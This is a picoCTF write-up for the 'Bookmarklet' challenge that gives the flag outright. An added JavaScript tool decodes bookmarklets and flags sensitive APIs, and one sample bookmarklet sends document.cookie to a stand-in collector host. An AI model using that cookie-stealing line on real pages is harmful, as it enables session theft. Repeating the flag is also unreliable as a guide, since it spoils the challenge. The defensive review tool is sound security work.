PicoGym Web Exploitation Writeup | Bookmarklet | Easy | PicoCTF



Originally posted on my Medium page.


In this challenge, we’re asked to uncover a hidden flag using a bookmarklet.
A bookmarklet is a small piece of JavaScript code saved as a browser bookmark. When clicked, it runs on the current webpage — and in this case, it’s designed to reveal the flag for us.

Clicking Launch Instance gives us the link to the website.

Let’s visit the website, explore how the bookmarklet works, and grab that flag!

On the webpage, we can see a message and a JavaScript bookmarklet.

Copy the JavaScript code.

Now, let’s run this code manually using the browser’s developer console:

  • Press Ctrl + Shift + I (or right-click → Inspect)
  • Go to the Console tab
  • Paste the copied JavaScript code into the console.

Press Enter to execute the code.

An alert box pops up displaying the flag.

The flag is: picoCTF{p@g3_turn3r_1d1ba7e0}
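
The console steps above run the bookmarklet exactly as copied. As an added example (not from the original writeup or the challenge), the code below decodes a `javascript:` URL and lists the sensitive browser APIs it references, so the source can be read before it is pasted into a console. The function names, the pattern list and both sample bookmarklets are constructed for illustration.

```javascript
// Added example: decode a bookmarklet into readable source and list the
// sensitive browser APIs it touches, so it can be reviewed before it is run.

// APIs worth a second look in code about to run on a logged-in page.
// This list is an assumption for illustration, not an exhaustive rule set.
const SENSITIVE_PATTERNS = [
  ["reads cookies", /\bdocument\.cookie\b/],
  ["reads web storage", /\b(?:localStorage|sessionStorage)\b/],
  ["sends network requests", /\b(?:fetch|XMLHttpRequest|sendBeacon|WebSocket)\b/],
  ["evaluates dynamic code", /\b(?:eval|Function)\s*\(/],
  ["loads external script", /createElement\(\s*['"]script['"]\s*\)/],
  ["navigates the page", /\blocation\s*(?:\.href\s*)?=[^=]/],
];

// Strip the javascript: scheme and undo percent-encoding.
function decodeBookmarklet(href) {
  const trimmed = href.trim();
  if (!/^javascript:/i.test(trimmed)) {
    throw new Error("not a javascript: URL");
  }
  let body = trimmed.slice("javascript:".length);
  try {
    body = decodeURIComponent(body); // bookmarklets are often percent-encoded
  } catch (_) {
    // A stray '%' makes decodeURIComponent throw; keep the raw text instead.
  }
  return body;
}

// Return the readable source plus the labels of every pattern it matches.
function reviewBookmarklet(href) {
  const source = decodeBookmarklet(href);
  const findings = SENSITIVE_PATTERNS
    .filter(([, pattern]) => pattern.test(source))
    .map(([label]) => label);
  return { source, findings };
}

// Constructed samples (neither is the challenge's bookmarklet).
const benign = "javascript:(function(){alert(document.title);})();";
const risky =
  "javascript:(function()%7Bfetch('https://collector.example/?c='%2Bdocument.cookie)%7D)();";

console.log(reviewBookmarklet(benign));
console.log(reviewBookmarklet(risky));
```

An empty `findings` array only means none of the listed patterns matched; the decoded `source` still needs to be read.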

